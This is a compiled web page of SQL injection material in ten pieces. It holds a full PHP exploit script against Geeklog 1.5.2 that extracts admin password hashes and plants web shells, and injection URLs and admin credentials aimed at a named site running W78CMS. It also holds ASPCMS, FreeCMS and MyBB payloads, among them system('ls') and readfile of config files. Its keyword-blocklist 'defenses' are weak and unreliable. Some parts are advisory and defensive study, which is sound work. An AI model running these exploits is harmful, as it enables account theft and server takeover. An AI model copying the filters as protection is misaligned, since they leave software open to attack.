Geeklog SEC_authenticate Function SQL Injection Vulnerability

Date: 2022-12-16 07:37:28

Geeklog SEC_authenticate Function SQL Injection Vulnerability (10 pieces) was contributed by the user "你要每天开心"; below is the collection as compiled by the editor, in the hope that it helps everyone!

Piece 1: A function to prevent SQL injection vulnerabilities

This only represents my own view, and I am not afraid of being laughed at; if anything is wrong, please correct me! If you are an expert, this is not worth your time, but I think it still has some practical value for the many ASP programmers who are just starting out, so I am posting it here anyway, laughter and all!

<%
Function checkStr(str)
    if isnull(str) then
        checkStr = ""
        exit function
    end if
    'each replace works on the result of the previous one, so all of them take effect
    checkStr=replace(str," ","")
    checkStr=replace(checkStr,"'","'")
    checkStr=replace(checkStr,";","'")
    checkStr=replace(checkStr,"--","'")
    checkStr=replace(checkStr,"(","'")
    checkStr=replace(checkStr,"[","'")
    checkStr=replace(checkStr,"$","'")
end function
%>

Related functions

Left(string, length)

Returns the specified number of characters counted from the left of the string.

Asc(string)

Returns the ANSI character code corresponding to the first letter of the string.

Mid(string, start[, length])

Returns the specified number of characters from within the string.

***********************************

My own approach is to limit the string to 8 characters, ha! (Ten million rows of data; nobody has that many records, right? 99,999,999, ha! Of course that's plenty! Unless your data is never updated or deleted, in which case there is nothing to be done, and the real question is how fast SQL would still be by then.)

<%
if len(request.querystring("ddd"))>8 then
    response.write("黑我啊,不要了。少来")
    response.end 'best to have this line
end if
'''first check whether it is a number ======= the IsNumeric function
if IsNumeric(request.querystring("ddd")) then
    Execute("select * from [table]")
    ....
else
    response.write("黑我啊,不要了,少来")
    response.end 'best to have this line
end if
%>

Of course, combined with the function above inside your SQL procedures, the effect is very complete!

Ha!!! Let's go one step further and make an even more paranoid function.

<%
Function checkStr(str)
    if isnull(str) then
        checkStr = ""
        exit function
    end if
    'each replace works on the result of the previous one, so all of them take effect
    checkStr=replace(str," ","")
    checkStr=replace(checkStr,"'","'")
    checkStr=replace(checkStr,";","'")
    checkStr=replace(checkStr,"--","'")
    checkStr=replace(checkStr,"(","'")
    checkStr=replace(checkStr,"[","'")
    checkStr=replace(checkStr,"$","'")
    checkStr=replace(checkStr,"asc"," ")
    checkStr=replace(checkStr,"mid"," ")
    checkStr=replace(checkStr,"delete"," ")
    checkStr=replace(checkStr,"drop"," ")
    '''Ha!! I did not block select or count here, ha! It makes me laugh just thinking about it, far too paranoid; wouldn't it be even safer if I simply didn't use anything at all!!! Ha!!~^)^~
end function
%>

That is enough; load this function wherever SQL selects a recordset.

For example: rsql="select * from table where xxx="&checkstr(request.querystring("xxyy"))&""

Or simply validate the string up front.

This is a bit chaotic, but that is all there is to it. Against ordinary attackers it is already enough to cost them some time; but against the seasoned, genuine ones none of this is a silver bullet: they break into the server itself, so what can you do? Heh!!

I read some material, combined it with my own experience, and wrote it down here as a review for myself; readers who see it are welcome to discuss!

Piece 2: Geeklog SEC_authenticate function SQL injection vulnerability

Affected versions:

geeklog <= 1.5.2

Vulnerability description:

Geeklog is a free, open-source web application that lets users create a virtual community, manage users, post articles and so on. Geeklog is implemented in PHP with MySQL as the backend database.

The SEC_authenticate function reached from Geeklog's index.php module does not properly validate the user-supplied PHP_AUTH_USER and REMOTE_USER variables, so a remote attacker can perform SQL injection by submitting a malicious request. The vulnerable code is at lines 34-53 of /public_html/webservices/atom/index.php:

...
require_once '../../lib-common.php';
if (PHP_VERSION < 5) {
    $_CONF['disable_webservices'] = true;
} else {
    require_once $_CONF['path_system'] . '/lib-webservices.php';
}
if ($_CONF['disable_webservices']) {
    COM_displayMessageAndAbort($LANG_404[3], '', 404, 'Not Found');
}
header('Content-type: ' . 'application/atom+xml' . '; charset=UTF-8');
WS_authenticate();
...

The WS_authenticate() function at lines 780-877 of /system/lib-webservices.php:

...
function WS_authenticate()
{
    global $_CONF, $_TABLES, $_USER, $_GROUPS, $_RIGHTS, $WS_VERBOSE;
    $uid = '';
    $username = '';
    $password = '';
    $status = -1;
    if (isset($_SERVER['PHP_AUTH_USER'])) {
        $username = $_SERVER['PHP_AUTH_USER'];
        $password = $_SERVER['PHP_AUTH_PW'];
        if ($WS_VERBOSE) {
            COM_errorLog("WS: Attempting to log in user '$username'");
        }
    } elseif (!empty($_SERVER['REMOTE_USER'])) {
        list($auth_type, $auth_data) = explode(' ', $_SERVER['REMOTE_USER']);
        list($username, $password) = explode(':', base64_decode($auth_data));
        if ($WS_VERBOSE) {
            COM_errorLog("WS: Attempting to log in user '$username' (via \$_SERVER['REMOTE_USER'])");
        }
    } else {
        if ($WS_VERBOSE) {
            COM_errorLog("WS: No login given");
        }
    }
...

Then at lines 907-909:

...
if (($status == -1) && $_CONF['user_login_method']['standard']) {
    $status = SEC_authenticate($username, $password, $uid);
}
...

Lines 695-717 of /system/lib-security.php:

...
function SEC_authenticate($username, $password, &$uid)
{
    global $_CONF, $_TABLES, $LANG01;
    $result = DB_query("SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))"); //<------------------- SQL INJECTION HERE
    $tmp = DB_error();
    $nrows = DB_numRows($result);
    if (($tmp == 0) && ($nrows == 1)) {
        $U = DB_fetchArray($result);
        $uid = $U['uid'];
        if ($U['status'] == USER_ACCOUNT_DISABLED) {
            // banned, jump to here to save an md5 calc.
            return USER_ACCOUNT_DISABLED;
        } elseif ($U['passwd'] != SEC_encryptPassword($password)) {
            return -1; // failed login
        } elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) {
            return USER_ACCOUNT_AWAITING_APPROVAL;
        } elseif ($U['status'] == USER_ACCOUNT_AWAITING_ACTIVATION) {
            // Awaiting user activation, activate:
            DB_change($_TABLES['users'], 'status', USER_ACCOUNT_ACTIVE,
                      'username', $username);
            return USER_ACCOUNT_ACTIVE;
        } else {
            return $U['status']; // just return their status
        }
    } else {
        $tmp = $LANG01[32] . ": '" . $username . "'";
        COM_errorLog($tmp, 1);
        return -1;
    }
}
...

SQL code can be injected through this function's username parameter, which comes from the $_SERVER['PHP_AUTH_USER'] or $_SERVER['REMOTE_USER'] variable; neither value is escaped before it is placed inside the quoted string in the query.
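As an added example (not Geeklog's code and not part of the advisory), here is a Python/sqlite3 model of the SEC_authenticate query in both its interpolated form and a parameterized form, run against a constructed users table. The probe the advisory's test script sends (username ' with an empty password) makes the interpolated query fail with a database error, which is exactly the "An SQL error has occurred." signal that script watches for, while the parameterized query treats the same value as an ordinary, non-matching username. MD5 as the password hash (consistent with the MD5('AAAA') the test script supplies), the column layout and the numeric status constants are assumptions made for this demo.

```python
import hashlib
import sqlite3

# Geeklog account status codes as used by SEC_authenticate (numeric values assumed for this demo).
USER_ACCOUNT_DISABLED = 1
USER_ACCOUNT_ACTIVE = 3
SQL_ERROR = "sql-error"   # stands in for the DB_error() != 0 path ("An SQL error has occurred.")


def encrypt_password(password):
    # Assumed to be plain MD5, matching the MD5('AAAA') / password 'AAAA' pair in the test script.
    return hashlib.md5(password.encode()).hexdigest()


def make_users_db():
    """Constructed in-memory stand-in for the Geeklog users table (normally prefixed gl_)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid INTEGER, username TEXT, passwd TEXT, "
                 "status INTEGER, remoteservice TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (2, "Admin", encrypt_password("adminpw"), USER_ACCOUNT_ACTIVE, None),
        (3, "alice", encrypt_password("secret"), USER_ACCOUNT_ACTIVE, ""),
    ])
    return conn


def _status_after_query(rows, password):
    """The part of SEC_authenticate that runs once the row has been fetched."""
    if len(rows) != 1:
        return -1                      # no (or ambiguous) account: failed login
    status, passwd, _uid = rows[0]
    if status == USER_ACCOUNT_DISABLED:
        return USER_ACCOUNT_DISABLED   # banned: returned before the hash check
    if passwd != encrypt_password(password):
        return -1                      # wrong password
    return status


def sec_authenticate_vulnerable(conn, username, password):
    """Username interpolated into the SQL text, as in lib-security.php lines 695-717."""
    sql = ("SELECT status, passwd, uid FROM users WHERE username='%s' "
           "AND ((remoteservice is null) or (remoteservice = ''))" % username)
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return SQL_ERROR               # a lone quote breaks the statement: the probe's signal
    return _status_after_query(rows, password)


def sec_authenticate_fixed(conn, username, password):
    """Same query with a bound parameter: the username is only compared, never parsed as SQL."""
    sql = ("SELECT status, passwd, uid FROM users WHERE username=? "
           "AND ((remoteservice is null) or (remoteservice = ''))")
    rows = conn.execute(sql, (username,)).fetchall()
    return _status_after_query(rows, password)


if __name__ == "__main__":
    db = make_users_db()
    for user, pw in (("alice", "secret"), ("alice", "wrong"), ("'", "")):
        print(repr(user), "interpolated:", sec_authenticate_vulnerable(db, user, pw),
              "parameterized:", sec_authenticate_fixed(db, user, pw))
```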

Test method:

The program (method) provided on this site may be offensive in nature; it is for security research and teaching only, and the risk is yours!

<?php
$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extension loaded!";
if (php_sapi_name() <> "cli") {
    die($err[0]);
}
if (!extension_loaded('curl')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
    if ($win) {
        !dl("php_curl.dll") ? die($err[1]) : nil;
    } else {
        !dl("php_curl.so") ? die($err[1]) : nil;
    }
}
function syntax() {
    print (
    "Syntax: php ".$argv[0]." [host] [path] [OPTIONS] \n".
    "Options:                                                              \n".
    "--port:[port]        - specify a port                                 \n".
    "                       default->80                                    \n".
    "--prefix             - try to extract table prefix from information.schema \n".
    "                       default->gl_                                   \n".
    "--uid:[n]            - specify an uid other than default (2,usually admin) \n".
    "--proxy:[host:port]  - use proxy                                      \n".
    "--skiptest           - skip preliminary tests                         \n".
    "--test               - run only tests                                 \n".
    "--export_shell:[path] - try to export a shell with INTO OUTFILE, needs Mysql\n".
    "                       FILE privilege                                 \n".
    "--sp                 -  submit a 'staticpage' with php code, needs geeklog \n".
    "                       sp_php permission set to true for thestaticpage    \n".
    "                       plugin (not the default)                       \n".
    "Examples:  php ".$argv[0]." 192.168.0.1 /geeklog/                    \n".
    "           php ".$argv[0]." 192.168.0.1 / --prefix --proxy:1.1.1.1:8080  \n".
    "           php ".$argv[0]." 192.168.0.1 / --prefix --export_shell:/var/www\n".
    "           php ".$argv[0]." 192.168.0.1 / --prefix --uid:3");
    die();
}
error_reporting(E_ALL ^ E_NOTICE);
$host = $argv[1];
$path = $argv[2];
$prefix = "gl_"; //default
$uid = "2";
$where = "uid=$uid";
$argv[2] ? print("[*] Attacking...\n") : syntax();
$_f_prefix = false;
$_use_proxy = false;
$port = 80;
$_skiptest = false;
$_verbose = false;
$_test = false;
$sp_submit = false;
$into_outfile = false;
for ($i = 3; $i < $argc; $i++) {
    if (stristr($argv[$i], "--prefix")) {
        $_f_prefix = true;
    }
    if (stristr($argv[$i], "--proxy:")) {
        $_use_proxy = true;
        $tmp = explode(":", $argv[$i]);
        $proxy_host = $tmp[1];
        $proxy_port = (int)$tmp[2];
    }
    if (stristr($argv[$i], "--port:")) {
        $tmp = explode(":", $argv[$i]);
        $port = (int)$tmp[1];
    }
    if (stristr($argv[$i], "--uid")) {
        $tmp = explode(":", $argv[$i]);
        $uid = (int)$tmp[1];
        $where = "uid=$uid";
    }
    if (stristr($argv[$i], "--verbose")) {
        $_verbose = true;
    }
    if (stristr($argv[$i], "--skiptest")) {
        $_skiptest = true;
    }
    if (stristr($argv[$i], "--test")) {
        $_test = true;
    }
    if (stristr($argv[$i], "--export_shell:")) {
        $tmp = explode(":", $argv[$i]);
        $my_path = $tmp[1];
        $into_outfile = true;
    }
    if (stristr($argv[$i], "--sp")) {
        $sp_submit = true;
    }
}
function _s($url, $auth, $is_post, $request) {
    global $_use_proxy, $proxy_host, $proxy_port;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    if ($is_post) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
    }
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.0.7) Gecko/021910 Firefox/3.0.7");
    curl_setopt($ch, CURLOPT_TIMEOUT, 0);
    if ($auth <> "") {
        $auth = array("Authorization: Basic ".$auth);
        curl_setopt($ch, CURLOPT_HEADER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $auth);
    }
    if ($_use_proxy) {
        curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
    }
    $_d = curl_exec($ch);
    if (curl_errno($ch)) {
        die("[!] ".curl_error($ch)."\n");
    } else {
        curl_close($ch);
    }
    return $_d;
}
function find_prefix() {
    global $host, $port, $path, $uid, $pwd, $url;
    $_tn = "TABLE_NAME";
    $_ift = "information_schema.TABLES";
    $_table_prefix = "";
    $j = -15;
    $usr = "' AND 0 UNION SELECT null,null,null,null FROM $_ift WHERE ".$_tn." LIKE 0x25747261636b6261636b636f646573 LIMIT 1/*";
    $_o = _s($url, base64_encode($usr.":".$pwd), 0, "");
    if (chk_err($_o)) {
        die("[!] $_ift not availiable.");
    } else {
        print "[*] Initiating table prefix extraction...\n";
    }
    while (!$null_f) {
        $mn = 0x00;
        $mx = 0xff;
        while (1) {
            if (($mx + $mn) % 2 == 1) {
                $c = round(($mx + $mn) / 2) - 1;
            } else {
                $c = round(($mx + $mn) / 2);
            }
            $usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN (ASCII(SUBSTR(".$_tn." FROM $j FOR 1)) >= ".$c.") THEN '' ELSE $uid END) FROM $_ift WHERE ".$_tn." LIKE 0x25747261636b6261636b636f646573 LIMIT 1/*";
            $_o = _s($url, base64_encode($usr.":".$pwd), 0, "");
            if (chk_err($_o)) {
                $mn = $c;
            } else {
                $mx = $c - 1;
            }
            if (($mx-$mn == 1) or ($mx == $mn)) {
                $usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN (ASCII(SUBSTR(".$_tn." FROM $j FOR 1)) >= ".$c.") THEN '' ELSE $uid END) FROM $_ift WHERE ".$_tn." LIKE 0x25747261636b6261636b636f646573 LIMIT 1/*";
                $_o = _s($url, base64_encode($usr.":".$pwd), 0, "");
                if (chk_err($_o)) {
                    if ($mn <> 0) {
                        $_table_prefix = chr($mn).$_table_prefix;
                    } else {
                        $null_f = true;
                    }
                } else {
                    if ($mx <> 0) {
                        $_table_prefix = chr($mx).$_table_prefix;
                    } else {
                        $null_f = true;
                    }
                }
                if (!$null_f) {
                    print ("[?] Table prefix->[??]".$_table_prefix."\n");
                }
                break;
            }
        }
        $j--;
    }
    print "[?] Table prefix->".$_table_prefix."\n";
    return $_table_prefix;
}
function export_sh() {
    global $pwd, $url, $prefix, $my_path;
    $usr = "' AND 0 UNION SELECT null,'
INTO OUTFILE '".$my_path."/sh.php' FROM ".$prefix."users LIMIT 1/*";
    $_o = _s($url, base64_encode($usr.":".$pwd), 0, "");
    if (chk_err($_o)) {
        print ("[*] Sql error.");
    } else {
        print ("[*] Done.");
    }
}
function sp_php() {
    global $host, $port, $path, $pwd, $prefix, $uid;
    srand(make_seed());
    $id = rand(0x1, 0xffffff);
    echo "[*] id->".$id."\n";
    $sh = "passthru(\$_GET[cmd]);";
    //always specify the namespaceuri
    //if the staticpages.PHP permission is not avaliable, sp_php will be resetted to 0
    $data = "". "
xmlns=\"\x20\x20\x20\x20www.geeklog.net/xmlns/app/gl\">\x20\x20\x20\x20". "
xmlns=\"$id
www.geeklog.net/xmlns/app/gl\">$id". "
xmlns=\"$sh
www.geeklog.net/xmlns/app/gl\">$sh". "
xmlns=\"1
www.geeklog.net/xmlns/app/gl\">1". "
xmlns=\"1
www.geeklog.net/xmlns/app/gl\">1". "
";
    $usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,$uid FROM ".$prefix."users LIMIT 1/*";
    $url = "http://$host:$port".$path."webservices/atom/index.php?plugin=staticpages";
    $out = _s($url, base64_encode($usr.":".$pwd), 1, $data);
    if (chk_err($_o)) {
        print ("[*] Sql error.");
    } else {
        print ("[*] Done! Visit->$host:$port".$path."staticpages/index.php?page=$id&cmd=ls%20-la");
    }
}
function make_seed() {
    list($usec, $sec) = explode(' ', microtime());
    return (float) $sec + ((float) $usec * 100000);
}
function chk_err($s) {
    // the hex string spells "An SQL error has occurred."
    if (stripos ($s, "\x41\x6e\x20\x53\x51\x4c\x20\x65\x72\x72\x6f\x72\x20\x68\x61\x73\x20\x6f\x63\x63\x75\x72\x72\x65\x64\x2e")) {
        return true;
    } else {
        return false;
    }
}
$pwd = "AAAA";
$url = "http://$host:$port".$path."webservices/atom/index.php?plugin=staticpages";
if (!$_skiptest) {
    $out = _s($url, base64_encode("':'"), 0, "");
    if (chk_err($out)) {
        print("[*] Vulnerable!\n");
    } else {
        die("[!] Not vulnerable.");
    }
}
if ($_test) {
    die;
}
if ($_f_prefix == true) {
    $prefix = find_prefix();
}
if ($into_outfile == true) {
    export_sh();
    die;
}
if ($sp_submit == true) {
    sp_php();
    die;
}
$c = array();
$c = array_merge($c, range(0x30, 0x39));
$c = array_merge($c, range(0x61, 0x66));
$_hash = "";
print ("[*] Initiating hash extraction ...\n");
for ($j = 1; $j < 0x21; $j++) {
    for ($i = 0; $i <= 0xff; $i++) {
        $f = false;
        if (in_array($i, $c)) {
            //uid is mediumint, so if you assign a string value to it you have an sql error,
            //so the script fails hence true/fails questions and you bypass speed limit also
            $usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN (ASCII(SUBSTR(passwd FROM $j FOR 1))=$i) THEN '' ELSE $uid END) FROM ".$prefix."users WHERE $where LIMIT 1/*";
            $out = _s($url, base64_encode($usr.":".$pwd), 0, "");
            if (chk_err($out)) {
                $f = true;
                $_hash .= chr($i);
                print "[*] Md5 Hash: ".$_hash.str_repeat("?", 0x20-$j)."\n";
                break;
            }
        }
    }
    if ($f == false) {
        die("\n[!] Unknown error ...");
    }
}
print "[*] Done! Cookie: geeklog=$uid; password=".$_hash.";\n";
?>

Piece 3: W78CMS SQL injection vulnerability

SQL injection in W78 Enterprise ASP Website Management System V1.1

Program release date: March 18.

A system running completely naked, with no input filtering at all:

1. shopmore.asp

set rs=server.createobject("adodb.recordset")
exec="select * from [shop] where ssfl="& request.QueryString("id") &" order by id desc "
rs.open exec,conn,1,1
if rs.eof then
    response.Write " 该分类暂无产品!"
else
    rs.PageSize =20 'records per page
    iCount=rs.RecordCount 'total number of records
    iPageSize=rs.PageSize
    maxpage=rs.PageCount
    page=request("page")
    if Not IsNumeric(page) or page="" then
        page=1

2. about.asp

exec="select * from [about] where id="& request.QueryString("id")
set rs=server.createobject("adodb.recordset")
rs.open exec,conn,1,1

3. search_news.asp

dim title
title=request.form("form_news")
set rs=conn.execute("select * from [news] where title like '%"&title&"%'")
if title="" then
    response.write ("")
end if
if rs.eof then
    response.write ("")

There are other pages as well.

4. The online editor login page of this system is admin/eWebEditor/admin/login.asp

Default user: admin, password: 198625

If that does not get you in, you can also try

the two back-end default passwords 86779533 and abc123

Try the default database path /data/%23sze7xiaohu.mdb

exp: www.voicetune.com/about.asp?id=2%20and%201=2%20union%20select%201,admin,3,password,5,6%20from%20admin

www.voicetune.com/ShopMore.asp?id=13%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7,8,9%20from%20admin

Search-type injection: %' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='

Google: inurl:ShopMore.asp?id

Piece 4: The ultimate defense against SQL injection vulnerabilities!

SQL injection vulnerabilities are actually not that scary: knowing the principle plus patience and care is enough to defend against them completely! Below are 4 functions, enough to fend off every SQL injection vulnerability! Once you understand the code you can apply it anywhere; note that every request object must be filtered, including easily overlooked objects such as request.cookie and request.ServerVariables:

function killn(byval s1) 'filter numeric parameters
    if not isnumeric(s1) then
        killn=0
    else
        if s1<0 or s1>2147483647 then
            killn=0
        else
            killn=clng(s1)
        end if
    end if
end function

function killc(byval s1) 'filter currency parameters
    if not isnumeric(s1) then
        killc=0
    else
        killc=formatnumber(s1,2,-1,0,0)
    end if
end function

function killw(byval s1) 'filter string parameters
    if len(s1)=0 then
        killw=""
    else
        killw=trim(replace(s1,"'",""))
    end if
end function

function killbad(byval s1) 'filter all dangerous characters, including cross-site script
    If len(s1) = 0 then
        killbad=""
    else
        'the ampersand is escaped first so that the entities added afterwards are not encoded a second time
        killbad = trim(replace(replace(replace(replace(replace(replace(replace(replace(s1,"&","&amp;"),Chr(10),"<br>"),Chr(34),"&quot;"),">","&gt;"),"<","&lt;"),chr(39),"&#39;"),chr(32),"&nbsp;"),chr(13),""))
    end if
end function

Piece 5: ASPCMS 2.38 SQL injection vulnerability advisory

The ASPCMS system does not strictly filter user-submitted parameters, so an attacker can submit SQL statements to query the database and obtain sensitive information.

The vulnerability is in /admin_aspcms/_content/_Content/AspCms_ContentFun.asp. This file does not verify administrator privileges, so anyone can access it, and it does not pass the parameters it reads through the custom filterPara function, which leads to injection in several places. The code is as follows:

<% ''die debugmode
dim action : action=getForm("action","get")
dim ContentID, LanguageID, SortID, GroupID, Exclusive, Title, Title2, TitleColor, IsOutLink, OutLink, Author, ContentSource, ContentTag, Content, ContentStatus, IsTop, IsRecommend, IsImageNews, IsHeadline, IsFeatured, ContentOrder, IsGenerated, Visits, AddTime, ImagePath, IndexImage, DownURL, PageTitle, PageKeywords, PageDesc, PageFileName, spec, EditTime,DownGroupID,IsNoComment,Star,Timeing,TimeStatus,VideoGroupID,CHvalue,SpecCategory
''SpecCategory is used to tell which type the custom parameters belong to
dim sortType, keyword, page, psize, order, ordsc, sortTypeName
sortType=getForm("sortType","get")
if isnul(sortType) then sortType=0
sortid=getForm("sortid","post")
if isnul(sortid) then sortid=getForm("sortid","get")
keyword=getForm("keyword","post")
if isnul(keyword) then keyword=getForm("keyword","get")
page=getForm("page","get")
psize=getForm("psize","get")
order=getForm("order","get")
ordsc=getForm("ordsc","get")
DownGroupID=getForm("DownGroupID","post")
VideoGroupID=getForm("VideoGroupID","post")
select case sortType
    case "2"
        sortTypeName ="文章"
        SpecCategory = "C"
    case "3"
        sortTypeName ="产品"
        SpecCategory = "P"
    case "4"
        sortTypeName ="下载"
        SpecCategory = "DL"
    case "5"
        sortTypeName ="招聘"
        SpecCategory = "HR"
    case "6"
        sortTypeName ="相册"
        SpecCategory = "FO"
    case "8"
        sortTypeName = "视频"
        SpecCategory = "VI"
end select
''single page 1, article 2, product 3, download 4, recruitment 5, album 6, link 7, video 8
Select case action
    case "add" : addContent
    case "edit" : editContent
    case "move" : moveContent
    case "copy" : copyContent
    case "rpost" : rpostContent
    case "del" : delContent
    case "recovery" : Recovery
    case "tdel" : trueDelContent
    case "on" : onOff "on", "Content", "ContentID", "ContentStatus", "", getPageName&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc
    case "off" : onOff "off", "Content", "ContentID", "ContentStatus", "", getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc
    case "order" : UpdateOrder
End Select

Sub trueDelContent
    dim id : id=getForm("id","both")
    if isnul(id) then alertMsgAndGo "请选择要操作的内容","-1"
    if runmode=1 then
        dim rs, sql, filepath
        dim templateobj : set templateobj=new TemplateClass
        sql="select ContentID,Title,sortType,SortFolder,a.GroupID,ContentFolder,ContentFileName,a.AddTime,a.PageFileName,a.SortID,b.GroupID from {prefix}Content as a, {prefix}Sort as b where a.LanguageID="&session("languageID")&" and a.SortID=b.SortID and ContentStatus=2 and ContentID in("&id&")"
        set rs=conn.exec(sql,"r1")
        do while not rs.eof
            filepath=templateobj.getContentLink(rs("SortID"),rs("ContentID"),rs("SortFolder"),rs("a.GroupID"),rs("ContentFolder"), _
                rs("ContentFileName"),rs("AddTime"),rs("PageFileName"),rs("b.GroupID"))
            if isExistFile(filepath) then delFile filepath
            ''echo filepath&"
            rs.movenext
        loop
    end if
    conn.exec "delete from {prefix}Content where ContentStatus=2 and ContentID in("&id&")","exe"
    alertMsgAndGo "彻底删除成功",getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc
End Sub

Exploitation is fairly simple; iif is used to force an error:

www.xxx.com/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=97),2,chr(97))

Checks whether the first character of the administrator username is a.

www.xxx.com/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=98),2,chr(97))

Checks whether the first character of the administrator username is b.

When the comparison is false, an error is forced.

Piece 6: FreeCMS index.php SQL injection vulnerability

FreeCMS.us FreeCMS 0.2

Description:

BUGTRAQ ID: 29773

CNCAN ID: CNCAN-061903

FreeCMS is a PHP-based web application.

FreeCMS does not handle user-submitted input correctly; a remote attacker can exploit this to perform SQL injection, possibly obtaining sensitive information or manipulating the database.

The problem is that the 'index.php' script does not filter the user-supplied 'page' parameter; by constructing a malicious SQL query as the parameter data, the original SQL logic can be altered to obtain sensitive information or manipulate the database.

<* Reference:

Vulnerability reporter

Mr.SQL

*>

Test method:

[WARNING]

The following program (method) may be offensive in nature; it is for security research and teaching only. The risk is yours!

www.example.com/index.php?page=-28+union+select+concat_ws(0x3a,admin,password)+from+admin/*

Recommendation:

No solution is currently available:

www.freecms.us/

This information was collected from the SEBUG Security Database.

Piece 7: MyBB moderation.php SQL injection vulnerability

MyBB is a PHP-based web application.

MyBB does not properly filter user-submitted URI data; a remote attacker can exploit this to execute arbitrary code with the privileges of the web server.

The problem is that the 'forumdisplay.php' and 'search.php' scripts do not sufficiently filter the user-submitted 'fid' parameter; by submitting malicious data, and given a valid "sid", arbitrary code execution is possible.

Injection:

www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,7+UNION+ALL+SELECT+1,(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27)+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2

www.example.com/mybb.1.2.10/moderation.php?fid=2&action=allreports&rid=0'+UNION+SELECT+waraxe--+

www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads&moveto=2&threads=war|axe

Multiple remote PHP code executions:

www.example.com/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];phpinfo;exit;//

www.example.com/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];system('ls');exit;//

www.example.com/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];readfile('inc/config.php');exit;//

www.example.com/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='];phpinfo();exit;//

www.example.com/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='];system('ls');exit;//

www.example.com/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='];readfile('inc/config.php');exit;//

Piece 8: Defending against SQL injection vulnerabilities

Software security

For a website, the damage a SQL injection vulnerability can do is enormous.

Since the problem lies in the code, it ultimately has to be solved in the program code. However, many site owners do not really understand code; they simply download a system from the internet and use it, so asking them to modify the code themselves seems a bit much. Still, the developers of a program release patches from time to time, and site owners can close the holes by applying patches diligently.

Those who are able to write code should filter every piece of data received from the client before putting it into a SQL statement for execution. The usual practice used to be filtering the potentially vulnerable parameters one by one, but now someone has developed a general-purpose SQL anti-injection system.

Its idea is to filter all the data submitted to a page. Data submitted for SQL injection shares one characteristic: it contains SQL statements and SQL keywords, strings such as "AND", "UNION" and "SELECT". As long as these strings are present in the data, the request can be treated as a SQL injection attempt, and the data is then never executed as part of a SQL statement.

The following is code the author wrote by imitating the general-purpose SQL anti-injection system according to this idea:

<%
'--------Definitions------------------
Dim FangZhuPost,FangZhuGet,FangZhuIn,FangZhuInf,FangZhuXh
'Note: custom list of strings to filter, separated by "|"; readers who find an omission can add to it
FangZhuIn = "'|;|and|(|)|exec|insert|select|union|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
FangZhuInf = split(FangZhuIn,"|") 'Note: split the illegal strings apart on "|"
'--------POST section------------------
If Request.Form <> "" Then
    For Each FangZhuPost In Request.Form 'Note: loop over the submitted parameters
        For FangZhuXh=0 To Ubound(FangZhuInf) 'Note: the value is converted to lower case before comparing
            If Instr(LCase(Request.Form(FangZhuPost)),FangZhuInf(FangZhuXh)) <> 0 Then
                'Note: an illegal string is present in the data
                Response.Write ""
                Response.End
            End If
        Next
    Next
End If
'----------------------------------
'--------GET section-------------------
If Request.QueryString <> "" Then
    For Each FangZhuGet In Request.QueryString
        For FangZhuXh=0 To Ubound(FangZhuInf)
            If Instr(LCase(Request.QueryString(FangZhuGet)),FangZhuInf(FangZhuXh)) <> 0 Then
                Response.Write ""
                Response.End
            End If
        Next
    Next
End If
%>

Save this code in an asp file, for example fang.asp, and put that fang.asp file in the directory of the page files to be protected.

Then, at the beginning of each page to be protected, add a single line
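As an added example (not the article's code), here is a Python model of fang.asp's check, run over constructed requests: the W78CMS about.asp payload from piece 3 is caught on "and", but so are ordinary values such as "Sandra", "Midnight" and "O'Brien", because Instr matches substrings anywhere in the value. A source this filter never reads, such as the HTTP Authorization header that feeds Geeklog's PHP_AUTH_USER in piece 2, is not inspected at all, which is the point piece 4 makes about request.cookie and request.ServerVariables. The field names and sample values are constructed for the demo.

```python
# Model of fang.asp (added example, not the article's own code).
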